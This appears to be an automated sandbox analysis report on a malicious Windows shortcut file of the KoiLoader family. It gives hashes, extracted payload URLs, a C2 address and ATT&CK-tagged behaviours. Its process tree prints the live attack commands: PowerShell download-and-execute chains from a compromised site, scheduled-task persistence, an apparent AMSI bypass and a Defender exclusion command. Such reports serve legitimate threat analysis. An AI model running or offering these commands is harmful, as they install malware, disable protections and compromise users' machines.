Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
116s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03/12/2024, 11:14
Static task
static1
Behavioral task
behavioral1
Sample
22_11_2024_stmnt.lnk
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
22_11_2024_stmnt.lnk
Resource
win10v2004-20241007-en
General
-
Target
22_11_2024_stmnt.lnk
-
Size
3KB
-
MD5
f7f1052c9d09d61490d8f116238af21e
-
SHA1
0f2550bb03f31716232de245a02823885f529e09
-
SHA256
9ee3acebaae539dc60ea9321cfcf27451f6f05afc80ae7f7a959f76a8d587839
-
SHA512
51737afa22f193a892525226575877a0893521ffd3dec18542a7f2b0cdef5807f736ae4458a5cf7f306c8e033fdacea870d9527529172f74cbbdbcde8a646568
Malware Config
Extracted
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
Extracted
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
Extracted
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
Extracted
koiloader
http://195.123.217.43/oversate.php
-
payload_url
https://www.italialife24.it/wp-content/uploads/2021/05
Signatures
-
Koiloader family
-
Detects KoiLoader payload 2 IoCs
resource yara_rule behavioral2/memory/2940-57-0x0000000008550000-0x000000000855D000-memory.dmp family_koi_loader behavioral2/memory/4292-135-0x00000000077C0000-0x00000000077CD000-memory.dmp family_koi_loader -
Blocklisted process makes network request 8 IoCs
flow pid Process 9 448 powershell.exe 37 436 powershell.exe 38 2940 powershell.exe 39 2940 powershell.exe 44 2220 powershell.exe 45 2220 powershell.exe 52 3392 powershell.exe 53 4292 powershell.exe -
pid Process 2220 powershell.exe 448 powershell.exe 2156 powershell.exe 2940 powershell.exe 4292 powershell.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation wscript.EXE Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation wscript.EXE Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation wscript.exe -
Indicator Removal: Clear Persistence 1 TTPs 2 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
pid Process 3392 powershell.exe 436 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1372 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 448 powershell.exe 448 powershell.exe 436 powershell.exe 436 powershell.exe 2940 powershell.exe 2940 powershell.exe 2156 powershell.exe 2156 powershell.exe 2220 powershell.exe 2220 powershell.exe 3392 powershell.exe 3392 powershell.exe 4292 powershell.exe 4292 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 448 powershell.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeDebugPrivilege 2940 powershell.exe Token: SeDebugPrivilege 2156 powershell.exe Token: SeDebugPrivilege 2220 powershell.exe Token: SeDebugPrivilege 3392 powershell.exe Token: SeDebugPrivilege 4292 powershell.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 4224 wrote to memory of 448 4224 cmd.exe 83 PID 4224 wrote to memory of 448 4224 cmd.exe 83 PID 448 wrote to memory of 1372 448 powershell.exe 85 PID 448 wrote to memory of 1372 448 powershell.exe 85 PID 1368 wrote to memory of 436 1368 wscript.EXE 102 PID 1368 wrote to memory of 436 1368 wscript.EXE 102 PID 436 wrote to memory of 4220 436 powershell.exe 105 PID 436 wrote to memory of 4220 436 powershell.exe 105 PID 436 wrote to memory of 2012 436 powershell.exe 106 PID 436 wrote to memory of 2012 436 powershell.exe 106 PID 2012 wrote to memory of 2940 2012 wscript.exe 107 PID 2012 wrote to memory of 2940 2012 wscript.exe 107 PID 2012 wrote to memory of 2940 2012 wscript.exe 107 PID 3692 wrote to memory of 460 3692 DllHost.exe 111 PID 3692 wrote to memory of 460 3692 DllHost.exe 111 PID 3692 wrote to memory of 460 3692 DllHost.exe 111 PID 460 wrote to memory of 2156 460 cmd.exe 113 PID 460 wrote to memory of 2156 460 cmd.exe 113 PID 460 wrote to memory of 2156 460 cmd.exe 113 PID 2940 wrote to memory of 1068 2940 powershell.exe 114 PID 2940 wrote to memory of 1068 2940 powershell.exe 114 PID 2940 wrote to memory of 1068 2940 powershell.exe 114 PID 1068 wrote to memory of 2220 1068 cmd.exe 116 PID 1068 wrote to memory of 2220 1068 cmd.exe 116 PID 1068 wrote to memory of 2220 1068 cmd.exe 116 PID 3432 wrote to memory of 3392 3432 wscript.EXE 120 PID 3432 wrote to memory of 3392 3432 wscript.EXE 120 PID 3392 wrote to memory of 3452 3392 powershell.exe 123 PID 3392 wrote to memory of 3452 3392 powershell.exe 123 PID 3392 wrote to memory of 812 3392 powershell.exe 124 PID 3392 wrote to memory of 812 3392 powershell.exe 124 PID 812 wrote to memory of 4292 812 wscript.exe 127 PID 812 wrote to memory of 4292 812 wscript.exe 127 PID 812 wrote to memory of 4292 812 wscript.exe 127 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\22_11_2024_stmnt.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\Admin\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ3⤵
- Scheduled Task/Job: Scheduled Task
PID:1372
-
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\4Y25RLKWX7ET.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\4Y25RLKWX7ET.js "2⤵
- Blocklisted process makes network request
- Indicator Removal: Clear Persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f3⤵PID:4220
-
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\ProgramData\4Y25RLKWX7ET.js3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zMFXWWDVWWR'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\4Y25RLKWX7ET.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\4Y25RLKWX7ET.js "2⤵
- Blocklisted process makes network request
- Indicator Removal: Clear Persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f3⤵PID:3452
-
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\ProgramData\4Y25RLKWX7ET.js3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7z8UUKGAKBYB'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
-
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r755b0f1a-bb38-4bb2-bc7e-240c892146eer.js"1⤵PID:3716
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD538f80cd0e4b83433205388fe685b4739
SHA1911d3a6e0d55fe767dd6114d2f47f00c574971b9
SHA25663c918fc78d8b14d88d5bfdb46e2c9f4006ef36566a547cfa4513a9054bb632c
SHA512fbdda6e3f34293654db5c77a451d59497ad19571363da70a2026ee738c3617c81ea87ee19b3b604d7e369e74a74cd99f690b4df575933acf75cf28ed37c1ce3c
-
Filesize
1KB
MD54e57858e50d2d3348fd5cdaac9c45cb6
SHA1707da5594f9d616e17a337f111fbcfbd9c7da430
SHA256fa953391cd78a598c3f04fdb2942299e5f3213c3f9be579c9c7a490bee053b86
SHA512e3be104730bce5170dfe1d1fe444013295f54a0c70bdca42755c7243071714f8bebe52d71574051738d1fa2ece423723ad0d607d1cd90e184cbb90ef2cfa543a
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
19KB
MD5871a523b71e8a0ddafedb4bf6b28228a
SHA1629a002515cf86dcf39175af1b3b72be89ba1104
SHA256d7e567b2b89540347ce28208c63b9335b47211cd2fa4bcce08d852b7b9bbff88
SHA512b6db44085b5ca9bc7dc556e2091c152986c12a060aefe4cc7df53573236d97cf8e2b6606bbfe22c7107bd696261c416b614f7ab12a542e46438f9cdd829eeff5
-
Filesize
1KB
MD5477031a32089e6d066092d640b526add
SHA15041602c7c71b4c6e40928039dcc07b6b32a67f2
SHA2560ec3dcb238a28e1b43e2f7b03f955f6304927314c40a51f1d4b2b00345c12bef
SHA51201388ea1af8248901beb17d1fa62efead2ae1bf9accfc8e132f4f0c0e77c068fd7e998d218043fdc90c497824ca3723689502490da4fd97237a4f0d40ef2bb4e
-
Filesize
1KB
MD53db5a3b556b01c59c5812cb86abb674e
SHA13848e5419d5c47879f159247e4f1b08005674cf0
SHA256218d487f881ce9640acd16f7476b445471b83671569e99973f77d0bbf6c42ffa
SHA5123eb6575d3e476053a65b2631b0cd0d584056ca476058ee2706c69fe10b0502460c40f8985f1f4666e42fba2809924f6dc34ba2e9b2629217542e45cb3640adcd
-
Filesize
1KB
MD5143a478fb47996f74bbbcdaa252b9e0b
SHA1288893a45c1c50f8245a32aa06dfb1ac2ff31c83
SHA2566d91b6cc49e12bf850b873bfd57f591a37fe1aef5ca6e2bc8855dc866abf479b
SHA512e7e2d235fc60e58fe10961515db7f1a667cc58268b8cd3066afa5e7e4de0b1217e3cb85fbe24230b3eb7ac94399fa42971772954a0c309d3cb9334b7a67f93d8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
304B
MD51532c9a041d5c978a7201d8bb497cbbe
SHA1c5af01f7a147936e90511bdd9c261e8b1f3f16be
SHA256b046dc052809fff0c8907006e4be969703fdcc6c1c44471605a013cc71249f92
SHA5122b2fe36fa5daae028ba5a2289a292f1040ea643ae2556e6d3bcd3c3de7aeb4ef716da2ad62467373084527b8f2f49e776b503bfca2eeecdde116dd89998b707c